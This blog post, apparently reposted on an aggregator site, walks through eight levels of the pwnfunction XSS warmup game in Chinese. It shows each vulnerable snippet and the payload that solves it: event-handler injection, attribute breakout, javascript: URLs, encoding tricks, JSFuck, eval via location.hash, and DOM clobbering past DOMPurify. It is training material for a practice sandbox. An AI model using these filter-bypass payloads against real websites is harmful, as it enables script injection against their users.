DOM破坏

news2024/12/26 1:02:17

XSS Game

1、第一关 Ma Spaghet!

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

Somebody Toucha Ma Spaghet! | XSS Warmups (pwnfunction.com)icon-default.png?t=N7T8https://sandbox.pwnfunction.com/warmups/ma-spaghet.html?somebody=%3Cing%20src=1%20οnerrοr=%22alert(1337)%22%3E

可以更换为res.innerText

2、第二关  Jefff

<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

结果:

 3、第三关Ugandan Knuckles

<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

 过滤了“<>”

Ugandan Knuckles | XSS Warmups (pwnfunction.com)icon-default.png?t=N7T8https://sandbox.pwnfunction.com/warmups/da-wey.html?wey=aaaaa%22%20οnclick=%22alert(1)

会出现交互,换一种方式

用onfocus // wey=aaaaa"%20οnfοcus=alert(1337)%20autofocus//

先触发autofocus之后在触发οnfοcus=alert(1337)

Ugandan Knuckles | XSS Warmups (pwnfunction.com)

结果:

4、第四关Ricardo Milos

<!-- Challenge -->
<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)
</script>

get传参数

用加  ricardo=javascript:alert(1337) 出结果:

5、第五关Ah That's Hawt

<!-- Challenge -->
<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '')
    will.innerHTML = smith
</script>

正则表达式过滤了什么,()`\并且是全局过滤,这样一来,不能使用()就对弹窗很不利,那么我首先想到的办法就是编码,利用编码绕过

location="javascript:alert%25281337%2529">

结果:

6、第六关Ligma

/* Challenge */
balls = (new URL(location).searchParams.get('balls') || "Ninja has Ligma")
balls = balls.replace(/[A-Za-z0-9]/g, '')
eval(balls)

代码非常简单,大A到大Z,小A到小Z,0-9不能使用,要用编码。

alert(1)

[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])

用urlcode编码方式。

[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])

结果:

alert(1337)

结果:

7、第七关Mafia

/* Challenge */
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)

过滤了很多东西

方法:

1  使用js匿名函数

直接定义
   

    var print = function(s){
        console.log(s);
    };
    print(1);9

 使用构造函数

Function` 构造函数**创建一个新的 `Function` **对象**。

结果:

2、用parselnt函数用进制数返回

eval(8680439..toString(30))(1337)

结果:

3、location截取函数

截取#后面的值

eval(location.hash.slice(1))#alert(1)

结果:

8、第八关Ok, Boomer

<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

 创造“ok”元素进行调用执行

boomer=<a%20id=ok%20href="tel:alert(1337)">>

 结果:

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2048594.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【ubuntu24.04】wget配置代理加速下载

参考之前的wget代理配置 wget速度非常慢 配置控制台代理不行 配置wget代理 本机部署了代理程序:all_proxy 不识别:root@PerfSvr:~# cat set65proxy.sh #!/bin/sh export

[STM32F429_硬件知识01]

知识点1 &#xff1a;J-Link的使用步骤&#xff1a; step1 : 安装J-Link驱动程序 step2 : keil的魔术棒中 -> Debug -> Use中选择J_Link ->点击 Settings ->

AI 时代风暴:程序员的核心竞争力大揭秘

引言&#xff1a; 在当今科技浪潮以排山倒海之势汹涌澎湃之际&#xff0c;人工智能宛如璀璨星辰般不断涌现&#xff0c;AIGC&#xff08;如 chatgpt、midjourney、claude 等&#xff09;大语言模型如雨后春笋般破土而出&#xff0c;AI 辅助编程工具更是以风驰电掣之速迅速席卷编…

智能电销机器人提升工作效率

随着科技的不断发展&#xff0c;电销行业也在不断探索创新&#xff0c;其中电销机器人作为一种高效的工具&#xff0c;正逐渐成为企业提升工作效率的利器。让我们一起看看电销机器人如何助力企业提高效率&#xff1a; 1. 自动化拨打电话 电销机器人每天可以自动拨打大量电话&a…

element-plus表格组件el-table 的使用

表格是在前端页面中是经常被用到的&#xff0c;尤其是管理系统&#xff0c;几乎每个页面都会存在表格&#xff0c;所以掌握表格组件是非常有必要的。element-plus提供el-table&#xff0c;el-table-column来渲染表格&#xff0c; 1. el-table 组件主要属性 属性名作用值类型…

【C语言小项目】五子棋游戏

目录 前言 一、游戏规则 1.功能分析 2.玩法分析 3.胜负判定条件 二、游戏实现思路 三、代码实现与函数封装 1.项目文件创建 2.头文件说明 3.函数封装 1&#xff09;菜单实现 2&#xff09;进度条实现 3&#xff09;main函数实现 4&#xff09;Game函数 5&#xff0…

Java语言程序设计——篇十三(4)

&#x1f33f;&#x1f33f;&#x1f33f;跟随博主脚步&#xff0c;从这里开始→博主主页&#x1f33f;&#x1f33f;&#x1f33f; 欢迎大家&#xff1a;这里是我的学习笔记、总结知识的地方&#xff0c;喜欢的话请三连&#xff0c;有问题可以私信&#x1f333;&#x1f333;&…

下载中心: 使用异步方法生成文件任务+键集分页查询

文章目录 引言I 下载中心功能进度表设计异步处理文件生成案例II 键集分页查询提高查询效率解决分页查询出现数据重复或丢失案例III 工具线程池基于EasyExcel 生成 excel文件存储系统see also引言 需求: 根据查询条件导出数据,比如交易流水、设备安装资料。 流程设计:点击导…

牛客面经学习笔记(二)

锂离子电池的充电过程可以分为四个阶段&#xff1a;涓流充电&#xff08;低压预充&#xff09;、恒流充电、恒压充电以及充电终止。 阶段1&#xff1a;涓流充电——涓流充电用来先对完全放电的电池单元进行预充(恢复性充电)。在电池电压低于3V左右时采用涓流充电&#xff0c;涓…

Vue 生命周期详解含demo、面试常问问题案例

Vue 生命周期详解、面试常问问题案例 含 demo 文章目录 Vue 生命周期详解、面试常问问题案例 含 demo一、Vue 生命周期是什么二、Vue 中如何使用生命周期钩子1. **beforeCreate**2. **created**3. **beforeMount**4. **mounted**5. **beforeUpdate**6. **updated**7. **beforeD…

8.15笔记

一、mycat读写分离实现 1. 添加一个新的虚拟主机&#xff0c;设置ip为10.1.1.60,主机名为mycat.yuanyu.zhangmin.关闭防火墙 SELinux NetworkManager 2. 上传jdk和mycat安装包 3. 解压并且添加到指定的位置 [rootmycat ~]# ls anaconda-ks.cfg frp initserver.sh jdk1.8…

018集——递归函数和for循环对比(从1加到100实例) ——C#学习笔记

本例分别用递归函数和for循环&#xff0c;求出1到100的和&#xff1a; using System;namespace Mytest {class Mytest{static void Main(string[] args){Calculate Myc new Calculate();int YourNumber 100;int Mysum Myc.Xto1(YourNumber);Console.WriteLine("从1加到…

Element-03.组件-Pagination分页

一.常见组件-分页-属性 参数&#xff1a;background 说明&#xff1a;是否为分页按钮添加背景色 类型&#xff1a;boolean 有background即添加&#xff0c;没有则不添加 参数&#xff1a;layout 说明&#xff1a;组件布局&#xff0c;子组件名用逗号分隔 类型&#x…

86.小米相机修改拍照(尺寸,画幅,比例)的方法

目录 1.打开相机&#xff0c;拍照模式&#xff0c;上面有个箭头或三个点&#xff0c;点击 2.点击画幅 3.点击你想要的画幅即可。 想要修改手机照片的&#xff08;尺寸&#xff0c;画幅&#xff0c;比例&#xff09;时&#xff0c;总会去找分辨率&#xff0c;其实并不是&…

用后端实现一个简单的登录模块2 前端页面

该模块能做到的功能&#xff1a; 1阶&#xff1a;输入账号和密码&#xff0c;输入正确即可返回登录成功的信息&#xff0c;反之则登录失败 2阶&#xff1a;有简单的前端页面&#xff0c;有登录成功和失败的弹窗&#xff0c;还有登录成功的主页面 3阶&#xff1a;前端页面的注…

探索Python的中文转换魔法:zhconv库的神秘力量

文章目录 探索Python的中文转换魔法&#xff1a;zhconv库的神秘力量第一部分&#xff1a;背景介绍第二部分&#xff1a;库的概述第三部分&#xff1a;安装指南第四部分&#xff1a;函数使用示例第五部分&#xff1a;实际应用场景第六部分&#xff1a;常见问题与解决方案第七部分…

【Vue3】路由Query传参

【Vue3】路由Query传参 背景简介开发环境开发步骤及源码总结 背景 随着年龄的增长&#xff0c;很多曾经烂熟于心的技术原理已被岁月摩擦得愈发模糊起来&#xff0c;技术出身的人总是很难放下一些执念&#xff0c;遂将这些知识整理成文&#xff0c;以纪念曾经努力学习奋斗的日子…

24/8/17算法笔记 策略梯度reinforce算法

import gym from matplotlib import pyplot as plt %matplotlib inline#创建环境 env gym.make(CartPole-v0) env.reset()#打印游戏 def show():plt.imshow(env.render(mode rgb_array))plt.show() show()定义网络模型 import torch #定义模型 model torch.nn.Sequential(t…

8月17日星期六今日早报简报微语报早读

8月17日星期六&#xff0c;农历七月十四&#xff0c;早报微语早读。 1、海关总署&#xff1a;接触过猴痘病例的人员入境时应主动申报&#xff1b; 2、284名运动员出征&#xff01;巴黎残奥会中国体育代表团成立&#xff1b; 3、四部门&#xff1a;继续执行对彩票一次中奖不超…

C语言 之 字符相关函数

文章目录 字符分类函数字符转换函数 本章内容主要讲的是c语言中的字符相关的一些函数的作用用法和使用 为了方便我们对字符的各种操作&#xff0c;C语⾔标准库中提供了⼀系列库函数&#xff0c;我们大概可以根据其功能分成两类函数 字符分类函数 C语言中有一系列函数是专门用…